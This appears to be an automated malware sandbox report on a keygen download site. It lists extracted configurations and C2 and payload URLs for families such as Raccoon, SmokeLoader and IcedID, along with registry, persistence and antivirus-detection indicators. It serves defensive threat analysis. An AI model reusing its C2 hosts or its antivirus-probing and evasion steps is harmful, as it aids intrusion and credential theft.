azorult | hxxps://keygenninja[.]com/

Analysis

max time kernel
164s
max time network
514s
platform
windows10_x64
resource
win10v20201028
submitted
29-03-2021 12:49

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://keygenninja.com/
Sample

210329-xme9tqmjaa

Malware Config

Extracted

Family

raccoon

Botnet

4ce8ad65ffaa0dffa8cc56e03b4fd65c31c1a91d

Attributes

url4cnc
https://telete.in/j90dadarobin

rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

icedid

shturmann.space

Extracted

Family

smokeloader

Version

2020

http://xsss99.icu/upload/

http://bingooodsg.icu/upload/

http://junntd.xyz/upload/

http://ginessa11.xyz/upload/

http://overplayninsx.xyz/upload/

http://bananinze.com/upload/

http://daunimlas.com/upload/

rc4.i32

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral3/memory/7072-708-0x0000000002280000-0x0000000002B8A000-memory.dmp	family_glupteba
behavioral3/memory/7072-709-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba
behavioral3/memory/7072-715-0x0000000000400000-0x0000000000D24000-memory.dmp	family_glupteba

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Pony,Fareit
Pony is a Remote Access Trojan application that steals information.
rat spyware stealer pony
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

IcedID First Stage Loader 1 IoCs

loader

Processes:

resource	yara_rule
behavioral3/memory/7688-779-0x0000000001090000-0x0000000001097000-memory.dmp	IcedidFirstLoader

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral3/memory/6200-620-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6200-623-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig
behavioral3/memory/6200-649-0x0000000140000000-0x000000014070A000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 19 IoCs

Processes:

keygen-pr.exekeygen-step-1.exekeygen-step-2.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exekey.exemultitimer.exesetups.exeaskinstall20.exesetups.tmp8086.tmp.exemultitimer.exemultitimer.exeSetup3310.exe4gh4eaihjg3.exeSetup3310.tmp4gh4eaihjg3.tmp

pid	process
3664	keygen-pr.exe
5044	keygen-step-1.exe
2332	keygen-step-2.exe
4448	keygen-step-3.exe
4940	keygen-step-4.exe
2404	key.exe
3472	Setup.exe
2472	key.exe
4112	multitimer.exe
3248	setups.exe
2236	askinstall20.exe
2944	setups.tmp
3760	8086.tmp.exe
4700	multitimer.exe
3008	multitimer.exe
2024	Setup3310.exe
2356	4gh4eaihjg3.exe
3944	Setup3310.tmp
3392	4gh4eaihjg3.tmp

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

setups.tmp

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp

Loads dropped DLL 12 IoCs

Processes:

setups.tmp8086.tmp.exe

pid	process
2944	setups.tmp
2944	setups.tmp
2944	setups.tmp
2944	setups.tmp
2944	setups.tmp
2944	setups.tmp
2944	setups.tmp
3760	8086.tmp.exe
3760	8086.tmp.exe
3760	8086.tmp.exe
3760	8086.tmp.exe
3760	8086.tmp.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

multitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\irizkjqos5a = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\A4H7JJUJTJ\\multitimer.exe\" 1 3.1617022316.6061cd6c859f3"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

askinstall20.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
433	ip-api.com
753	ipinfo.io
327	ip-api.com
365	checkip.amazonaws.com
409	checkip.amazonaws.com
691	checkip.amazonaws.com
748	checkip.amazonaws.com
749	ipinfo.io
251	ipinfo.io
256	ipinfo.io
311	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

key.exe

description pid process target process

PID 2404 set thread context of 2472 2404 key.exe key.exe

description	pid	process	target process
PID 2404 set thread context of 2472	2404	key.exe	key.exe

Drops file in Windows directory 3 IoCs

Processes:

multitimer.exeMicrosoftEdge.exe

description	ioc	process
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
6072	2504	WerFault.exe	c4qumcq5lht.exe
2492	2504	WerFault.exe	c4qumcq5lht.exe
5620	2504	WerFault.exe	c4qumcq5lht.exe
5136	5360	WerFault.exe	winlthsth.exe
4104	2504	WerFault.exe	c4qumcq5lht.exe
4364	2504	WerFault.exe	c4qumcq5lht.exe
6288	2504	WerFault.exe	c4qumcq5lht.exe
6428	2504	WerFault.exe	c4qumcq5lht.exe
6552	2504	WerFault.exe	c4qumcq5lht.exe
6656	4596	WerFault.exe	win1host.exe
7772	7208	WerFault.exe	2ucje2ukzzo.exe
3840	7208	WerFault.exe	2ucje2ukzzo.exe
5432	7208	WerFault.exe	2ucje2ukzzo.exe
7916	7208	WerFault.exe	2ucje2ukzzo.exe
5836	7208	WerFault.exe	2ucje2ukzzo.exe
8960	7208	WerFault.exe	2ucje2ukzzo.exe
5224	7208	WerFault.exe	2ucje2ukzzo.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

500 schtasks.exe
7304 schtasks.exe
4960 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

4120 timeout.exe
2192 timeout.exe
5284 timeout.exe
6312 timeout.exe
8416 timeout.exe

pid	process
500	schtasks.exe
7304	schtasks.exe
4960	schtasks.exe

pid	process
4120	timeout.exe
2192	timeout.exe
5284	timeout.exe
6312	timeout.exe
8416	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe

GoLang User-Agent 4 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	449	Go-http-client/1.1
HTTP User-Agent header	620	Go-http-client/1.1
HTTP User-Agent header	621	Go-http-client/1.1
HTTP User-Agent header	436	Go-http-client/1.1

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

6884 taskkill.exe
5512 taskkill.exe
4060 taskkill.exe

pid	process
6884	taskkill.exe
5512	taskkill.exe
4060	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{144A04A3-C289-4AE8-A657-FEEF888B3A13}"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "ws1wzj3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{74F14399-B63C-4165-B5C9-47D68EA2794F}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000bef685248832590c306b22244bfdadf9e69245421ceeff6c6d88bd7e7bb56e75473a8d28f387cbb8fe0ab37d87498052ae19421c703e12b787f2	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ad9c26cc9924d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
